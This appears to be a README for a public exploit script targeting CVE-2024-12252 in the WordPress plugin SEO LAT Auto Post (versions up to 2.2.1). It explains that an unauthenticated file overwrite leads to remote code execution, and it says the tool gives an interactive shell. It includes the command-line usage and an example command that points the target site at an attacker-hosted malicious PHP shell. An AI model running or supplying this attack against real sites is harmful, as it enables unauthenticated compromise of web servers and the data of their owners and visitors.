
SEO LAT Auto Post <= 2.2.1 - Falta de autorización para sobrescritura/carga de archivos (Ejecución remota de código)
El plugin SEO LAT Auto Post para WordPress es vulnerable a la sobrescritura de archivos debido a una falta de verificación de capacidad en la acción AJAX remote_update en todas las versiones hasta la 2.2.1 inclusive. Esto permite que atacantes no autenticados sobrescriban el archivo seo-beginner-auto-post.php, lo que puede ser aprovechado para lograr una ejecución remota de código.
Este script explota la vulnerabilidad en el plugin SEO LAT Auto Post para lograr una ejecución remota de código sobrescribiendo el archivo seo-beginner-auto-post.php. El script automatiza el proceso de verificar la versión del plugin, activar el exploit y proporcionar un shell interactivo para ejecutar comandos.
usage: CVE-2024-12252.py [-h] -u URL --attack-url ATTACK_URL
CVE-2024-12252 | SEO LAT Auto Post <= 2.2.1 - Remote Code Execution # by: By Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Target base URL (e.g., http://example.com/wordpress)
--attack-url ATTACK_URL
Direct URL to your malicious PHP shell
Ejecute el script con la URL objetivo y la URL de su shell PHP malicioso:
python CVE-2024-12252.py -u http://example.com/wordpress --attack-url http://yourserver.com/shell.php